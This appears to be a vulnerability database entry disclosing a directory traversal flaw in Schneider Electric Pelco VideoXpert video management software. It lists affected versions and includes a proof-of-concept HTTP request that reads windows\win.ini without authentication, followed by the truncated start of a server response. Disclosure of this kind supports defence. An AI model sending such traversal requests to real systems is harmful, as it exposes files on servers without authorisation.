Schneider Electric Pelco VideoXpert...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### Summary VideoXpert is a video management solution designed for scalability, fitting the needs surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface. ### Description Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server. ### Vendor Schneider Electric SE - https://www.pelco.com ### Affected Version * 2.0.41 * 1.14.7 * 1.12.105 ### Tested On Microsoft Windows 7 Professional SP1 (EN) ### PoC ``` GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close ``` ``` HTTP/1.1 200 OK Date: Wed, 05 Apr 2017 13:27:39 GMT Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT Cache-Control: public,...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息